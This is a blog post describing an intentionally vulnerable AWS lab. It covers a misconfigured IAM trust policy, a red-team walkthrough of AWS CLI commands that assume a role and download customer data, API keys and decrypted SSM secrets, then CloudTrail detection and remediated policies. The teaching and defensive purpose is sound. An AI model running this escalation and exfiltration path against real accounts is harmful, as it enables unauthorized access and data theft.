DEV Community

Cover image for Building an Intentionally Vulnerable AWS Lab to Teach Cloud Security
Karan Vaghela
Karan Vaghela

Posted on

Building an Intentionally Vulnerable AWS Lab to Teach Cloud Security

Introduction

Most cloud engineers learn AWS by building functional infrastructure deploying EC2 instances, configuring S3 buckets, setting up VPCs. They pass certification exams that test theoretical knowledge of IAM policies and security groups. But they rarely see how attackers actually exploit cloud environments.

This gap is dangerous. Real-world cloud breaches don't happen because engineers forget to enable encryption. They happen because of subtle misconfigurations in IAM policies, overly permissive roles, and broken trust boundaries that look reasonable at first glance but create exploitable attack paths.

Intentionally vulnerable labs solve this problem. By building AWS environments with realistic security flaws, we can teach defenders what attackers see, how privilege escalation actually works, and why certain IAM patterns are toxic. This isn't about learning to attack it's about understanding the mechanics of cloud security failures so you can prevent them.

The common problem: you can read documentation about IAM wildcards being dangerous, or you can actually exploit an overly permissive policy and watch yourself gain admin access from a low-privilege starting point. One of these teaches you how to secure AWS. The other just tells you to.
Lab Architecture Overview

This lab simulates a small development environment with a web application backend. The architecture includes common AWS services with deliberately introduced weaknesses that mirror real-world misconfigurations.

Trust Boundaries:

IAM user → IAM role assumption (vulnerable boundary)
Public subnet → Private subnet (network boundary)
EC2 instance → S3 bucket (service boundary)

Attack Surface:

IAM policies allowing unintended role assumption
EC2 instance metadata service (IMDSv1)
Overly permissive S3 bucket policies
CloudTrail logs accessible to unauthorized principals

AWS Services Used

IAM (Identity and Access Management)

Core authentication and authorization mechanism
Policies determine who can do what
Most cloud breaches involve IAM misconfiguration, making it critical for security learning

EC2 (Elastic Compute Cloud)

Represents compute resources with attached IAM roles
Instance metadata service is a common attack vector
Demonstrates how compromised instances lead to credential exposure

S3 (Simple Storage Service)

Holds sensitive application data (simulated customer records, config files)
Misconfigured bucket policies are among the most common cloud vulnerabilities
Teaches object-level access controls and bucket permissions

CloudTrail

Logs all AWS API calls for auditing and forensics
Essential for detection and incident response
Demonstrates what attackers leave behind and how defenders investigate

VPC (Virtual Private Cloud)

Network isolation and segmentation
Security groups and NACLs control traffic flow
Shows relationship between network security and identity-based security

Systems Manager (SSM)

Parameter Store can hold secrets and configuration
Often misconfigured to allow unauthorized access
Demonstrates lateral movement paths through configuration services

Secrets Manager (optional)

Stores sensitive credentials with rotation capabilities
When misconfigured, becomes a treasure trove for attackers
Shows the difference between encrypted storage and access control

Intentional IAM Misconfigurations
The core vulnerability in this lab is an IAM trust policy that allows unintended role assumption. This mirrors a common real-world pattern where developers create roles for specific services but accidentally make them assumable by broader principals.
Vulnerable IAM Role: app-role

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::123456789012:root"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}
Enter fullscreen mode Exit fullscreen mode

Why This Is Dangerous:

Using the account root ARN (arn:aws:iam::ACCOUNT_ID:root) in a trust policy means any principal in that account can assume the role, not just the root user. This is a subtle but critical misunderstanding. Developers often think they're restricting access to the root user, but they're actually allowing all IAM users and roles in the account.
The role's permission policy grants extensive S3 access:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "s3:GetObject",
        "s3:PutObject",
        "s3:ListBucket"
      ],
      "Resource": [
        "arn:aws:s3:::app-data-prod",
        "arn:aws:s3:::app-data-prod/*"
      ]
    },
    {
      "Effect": "Allow",
      "Action": [
        "ssm:GetParameter",
        "ssm:GetParameters"
      ],
      "Resource": "arn:aws:ssm:us-east-1:123456789012:parameter/app/*"
    }
  ]
}
Enter fullscreen mode Exit fullscreen mode

Additional Misconfiguration: DevUser Policy
The DevUser is intended to have limited read-only access but has this policy attached:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "iam:ListRoles",
        "iam:GetRole",
        "sts:AssumeRole"
      ],
      "Resource": "*"
    },
    {
      "Effect": "Allow",
      "Action": [
        "ec2:DescribeInstances",
        "s3:ListAllMyBuckets"
      ],
      "Resource": "*"
    }
  ]
}
Enter fullscreen mode Exit fullscreen mode

The problem: DevUser can list all roles and assume any role that trusts the account. Combined with the vulnerable trust policy on app-role, this creates a privilege escalation path.
Attacker's Perspective (Red Team View)

⚠️ LAB ENVIRONMENT ONLY - DO NOT USE ON PRODUCTION OR UNAUTHORIZED SYSTEMS ⚠️

Starting Point: Compromised DevUser credentials (leaked in code repository, phished, etc.)

Step 1: Enumerate IAM Roles
bash# List all roles in the account
aws iam list-roles --profile devuser

Get details about interesting roles

aws iam get-role --role-name app-role --profile devuser
The attacker discovers app-role and examines its trust policy. They notice the trust policy allows any principal in the account to assume it.
Step 2: Check Current Identity
bash# Confirm current identity
aws sts get-caller-identity --profile devuser

Output:

{
     "UserId": "AIDAI4EXAMPLE",
     "Account": "123456789012",
     "Arn": "arn:aws:iam::123456789012:user/DevUser"
}
Enter fullscreen mode Exit fullscreen mode

Step 3: Assume the Privileged Role

Assume app-role

aws sts assume-role \
  --role-arn arn:aws:iam::123456789012:role/app-role \
  --role-session-name attacker-session \
  --profile devuser

Enter fullscreen mode Exit fullscreen mode

Output includes temporary credentials:

 {
   "Credentials": {
        "AccessKeyId": "ASIAXXX",
        "SecretAccessKey": "xxx",
        "SessionToken": "xxx",
        "Expiration": "2025-12-21T22:00:00Z"
    }
 }
Enter fullscreen mode Exit fullscreen mode

Step 4: Configure Temporary Credentials

Export the temporary credentials
export AWS_ACCESS_KEY_ID="ASIAXXX"
export AWS_SECRET_ACCESS_KEY="xxx"
export AWS_SESSION_TOKEN="xxx"

# Verify new identity
aws sts get-caller-identity

Enter fullscreen mode Exit fullscreen mode
# Output:
# {
#     "UserId": "AROAXXXXX:attacker-session",
#     "Account": "123456789012",
#     "Arn": "arn:aws:sts::123456789012:assumed-role/app-role/attacker-session"
# }
Enter fullscreen mode Exit fullscreen mode

Step 5: Access Sensitive Data
bash

# List objects in the production bucket
aws s3 ls s3://app-data-prod/

# Download sensitive files
aws s3 cp s3://app-data-prod/customer-data.csv .
aws s3 cp s3://app-data-prod/api-keys.json .

# Retrieve secrets from Parameter Store
aws ssm get-parameter --name /app/database-password --with-decryption
aws ssm get-parameter --name /app/api-key --with-decryption
Enter fullscreen mode Exit fullscreen mode

Attack Path Summary:

Low-privilege DevUser → Enumerate IAM roles
Discover app-role with misconfigured trust policy
Assume app-role using STS
Access production S3 bucket and SSM parameters with elevated privileges
Exfiltrate sensitive data

What Makes This Realistic:

Developers commonly misunderstand IAM trust policy syntax
Low-privilege accounts often have sts:AssumeRole for legitimate reasons
The escalation path isn't obvious from any single policy it requires combining permissions
No alerts fire because the role assumption is technically authorized

Defender's Perspective (Blue Team View)
Detection Strategy:
CloudTrail logs contain all the evidence needed to detect this attack. The key is knowing what to look for.
Indicator 1: Role Enumeration

{
  "eventName": "GetRole",
  "eventTime": "2025-12-21T18:23:45Z",
  "userIdentity": {
    "type": "IAMUser",
    "principalId": "AIDAI4EXAMPLE",
    "arn": "arn:aws:iam::123456789012:user/DevUser",
    "accountId": "123456789012",
    "userName": "DevUser"
  },
  "requestParameters": {
    "roleName": "app-role"
  },
  "sourceIPAddress": "203.0.113.45"
}
Enter fullscreen mode Exit fullscreen mode

Why This Matters: DevUser listing and examining roles, especially those it shouldn't need to know about, is suspicious. Most users don't enumerate IAM roles unless they're investigating privilege escalation paths.
Indicator 2: Unusual AssumeRole Activity

{
  "eventName": "AssumeRole",
  "eventTime": "2025-12-21T18:24:12Z",
  "userIdentity": {
    "type": "IAMUser",
    "principalId": "AIDAI4EXAMPLE",
    "arn": "arn:aws:iam::123456789012:user/DevUser",
    "accountId": "123456789012",
    "userName": "DevUser"
  },
  "requestParameters": {
    "roleArn": "arn:aws:iam::123456789012:role/app-role",
    "roleSessionName": "attacker-session"
  },
  "resources": [
    {
      "type": "AWS::IAM::Role",
      "ARN": "arn:aws:iam::123456789012:role/app-role"
    }
  ]
}
Enter fullscreen mode Exit fullscreen mode

Why This Matters: DevUser has never assumed this role before. Baseline behavior analysis would flag this as anomalous. Additionally, the session name "attacker-session" is obviously suspicious (though real attackers would use something more innocuous).
Indicator 3: S3 Access from New Principal

{
  "eventName": "GetObject",
  "eventTime": "2025-12-21T18:25:33Z",
  "userIdentity": {
    "type": "AssumedRole",
    "principalId": "AROAXXXXX:attacker-session",
    "arn": "arn:aws:sts::123456789012:assumed-role/app-role/attacker-session",
    "accountId": "123456789012",
    "sessionContext": {
      "sessionIssuer": {
        "type": "Role",
        "principalId": "AROAXXXXX",
        "arn": "arn:aws:iam::123456789012:role/app-role",
        "accountId": "123456789012",
        "userName": "app-role"
      }
    }
  },
  "requestParameters": {
    "bucketName": "app-data-prod",
    "key": "customer-data.csv"
  }
}
Enter fullscreen mode Exit fullscreen mode

Why This Matters: The app-role is typically assumed by EC2 instances, not by IAM users. Seeing an IAM user assume this role and immediately access sensitive S3 objects is highly anomalous.

Detection Implementation:

CloudWatch Logs Insights Query:

fields @timestamp, userIdentity.userName, eventName, requestParameters.roleArn
| filter eventName = "AssumeRole"
| filter userIdentity.type = "IAMUser"
| filter requestParameters.roleArn like /app-role/
| sort @timestamp desc
Enter fullscreen mode Exit fullscreen mode

GuardDuty Finding:
GuardDuty would generate a Policy:IAMUser/RootCredentialUsage or similar finding if configured properly. While our specific pattern might not trigger a built-in finding, GuardDuty's anomaly detection would flag unusual IAM activity.
Manual Detection Checklist:

IAM users assuming roles they've never used before
Multiple GetRole calls before an AssumeRole
Access to S3 buckets from principals that don't normally access them
SSM parameter retrieval outside of normal application patterns
Source IP addresses from unexpected regions or ASNs

Real-World Detection:
In production environments, this attack is commonly caught by:

UEBA (User and Entity Behavior Analytics) tools that establish baselines
CloudTrail analysis in SIEM platforms (Splunk, Datadog, etc.)
AWS Config rules that alert on role assumption by unexpected principals
S3 access logging combined with anomaly detection

The attacker is caught when a security analyst reviews CloudTrail logs and notices the unusual sequence of IAM enumeration → role assumption → sensitive data access from a principal that shouldn't have this access pattern.
Remediation and Secure Design
Fixed IAM Role Trust Policy:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole",
"Condition": {
"StringEquals": {
"sts:ExternalId": "unique-external-id-12345"
}
}
}
]
}

Key Changes:

Principal is now ec2.amazonaws.com service, not account root
Added ExternalId condition for additional verification
Only EC2 instances can assume this role, not IAM users

Fixed DevUser Policy:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "ec2:DescribeInstances",
        "s3:ListAllMyBuckets"
      ],
      "Resource": "*"
    },
    {
      "Effect": "Deny",
      "Action": [
        "iam:*",
        "sts:AssumeRole"
      ],
      "Resource": "*"
    }
  ]
}
Enter fullscreen mode Exit fullscreen mode

Key Changes:

Removed IAM enumeration permissions
Explicitly deny sts:AssumeRole to prevent role switching
Apply least privilege only permissions actually needed

S3 Bucket Policy with Least Privilege:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::123456789012:role/app-role"
      },
      "Action": [
        "s3:GetObject",
        "s3:PutObject"
      ],
      "Resource": "arn:aws:s3:::app-data-prod/*",
      "Condition": {
        "StringEquals": {
          "s3:ExistingObjectTag/Environment": "production"
        }
      }
    },
    {
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:*",
      "Resource": [
        "arn:aws:s3:::app-data-prod",
        "arn:aws:s3:::app-data-prod/*"
      ],
      "Condition": {
        "Bool": {
          "aws:SecureTransport": "false"
        }
      }
    }
  ]
}
Enter fullscreen mode Exit fullscreen mode

AWS-Native Security Controls:

  1. Enable IMDSv2 on EC2 Instances bashaws ec2 modify-instance-metadata-options \ --instance-id i-1234567890abcdef0 \ --http-tokens required \ --http-put-response-hop-limit 1
  2. Use IAM Access Analyzer bash# Create analyzer to detect external access aws accessanalyzer create-analyzer \ --analyzer-name account-analyzer \ --type ACCOUNT
  3. Enable GuardDuty bashaws guardduty create-detector --enable
  4. Implement SCPs (Service Control Policies) For organizations with multiple accounts, use SCPs to prevent dangerous IAM patterns:
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Deny",
      "Action": [
        "iam:CreateAccessKey",
        "iam:CreateUser"
      ],
      "Resource": "*",
      "Condition": {
        "StringNotEquals": {
          "aws:PrincipalOrgID": "o-xxxxxxxxxx"
        }
      }
    }
  ]
}
Enter fullscreen mode Exit fullscreen mode
  1. CloudTrail Best Practices

Enable log file validation
Store logs in a separate security account
Enable MFA delete on log bucket
Set up alerts for critical IAM events

Least Privilege Principles Applied:

Service-specific principals: Roles should trust services (like EC2, Lambda), not account root
Condition keys: Add conditions to further restrict when policies apply
Explicit denies: Use deny statements to prevent circumvention
Time-bounded credentials: Use temporary credentials with short expiration
Resource-level permissions: Specify exact resources, avoid wildcards
Regular auditing: Use Access Analyzer and IAM Access Advisor to find unused permissions

Lessons Learned

  1. IAM Trust Policies Are Not Intuitive
    The biggest lesson: "Principal": {"AWS": "arn:aws:iam::ACCOUNT_ID:root"} does not mean "only the root user." It means "any principal in this account." This single misunderstanding causes countless production incidents. You can read this in documentation, but exploiting it in a lab makes it unforgettable.

  2. Enumeration Is the First Step
    Attackers with limited credentials immediately enumerate what's available. They run list-roles, list-users, describe-instances, list-buckets. Defenders need to treat excessive enumeration as a red flag, not normal behavior. Baselines matter.

  3. Privilege Escalation Paths Are Rarely Obvious
    The vulnerable path in this lab requires combining three elements: DevUser's sts:AssumeRole permission, app-role's trust policy, and app-role's S3 permissions. No single policy looks immediately dangerous. Real attacks work the same way they chain together reasonable-looking permissions into exploitation.

  4. Detection Requires Context
    A single AssumeRole call isn't suspicious. An IAM user assuming a role normally used by EC2 instances is suspicious. Good detection isn't about alerting on individual events it's about understanding normal behavior and flagging deviations.

  5. Least Privilege Is Hard
    Writing the remediated policies takes more effort than writing the vulnerable ones. The secure versions require understanding service principals, condition keys, and resource ARNs. This is why overly permissive policies are so common they're easier. Labs teach you the cost of taking shortcuts.

  6. Theory vs. Practice Gap
    Reading "don't use wildcards in IAM policies" teaches you nothing. Exploiting a wildcard in Resource: "*" to access sensitive S3 buckets teaches you why the rule exists. Building and breaking systems creates understanding that studying alone cannot.

  7. CloudTrail Is Your Forensic Foundation
    Every action in this attack is logged. The evidence is there. But if you don't know what to look for, or if your logs are poorly organized, you won't find it. Effective security requires not just enabling CloudTrail, but actively querying and analyzing it.

  8. Defense Depth Matters
    The remediation doesn't rely on a single control. It combines: fixed trust policies, least privilege IAM policies, S3 bucket policies, GuardDuty, IAM Access Analyzer, and IMDSv2. Layered security means an attacker has to bypass multiple controls, not just one.
    What This Lab Teaches That Theory Cannot:

The muscle memory of running AWS CLI commands as an attacker
What CloudTrail logs actually look like during an attack
The psychological experience of privilege escalation (it feels easy, which is alarming)
How to write IAM policies that actually stop these attacks
Why security engineering is about understanding attacker tradecraft

Conclusion

  • Building intentionally vulnerable AWS labs bridges the gap between theoretical cloud security knowledge and practical defensive skills. When you've successfully exploited an IAM misconfiguration yourself, you understand viscerally why certain patterns are dangerous. When you've hunted through CloudTrail logs to detect your own simulated attack, you know what to look for in production.

  • This isn't about learning to be an attacker. It's about thinking like one so you can build defenses that actually work. Cloud security isn't about memorizing AWS documentation it's about understanding how identity, permissions, and trust boundaries interact in ways that create exploitable paths.

  • The lab environment described here is a starting point. Extend it. Add Lambda functions with overly permissive execution roles. Configure an S3 bucket with public access. Create an EC2 instance with IMDSv1 enabled and credentials in user data. Each vulnerability you add is another lesson for anyone who works through it.

  • Security teams benefit from engineers who understand both offense and defense. DevSecOps teams need people who can review IAM policies and spot privilege escalation risks. Cloud architects need to design systems that are secure by default, not retrofit security later. Labs like this train all of those skills simultaneously.

  • Build these environments in isolated AWS accounts. Document the vulnerabilities. Walk teammates through the exploitation and remediation. Host internal workshops where engineers red team each other's infrastructure. The AWS community grows stronger when we learn from controlled failures rather than production incidents.

  • Responsible experimentation in lab environments is how we develop the expertise to secure production systems. This is ethical learning done right controlled, educational, and defensive-minded. The goal is never to exploit real systems. It's to understand exploitation well enough that you can prevent it.

Top comments (0)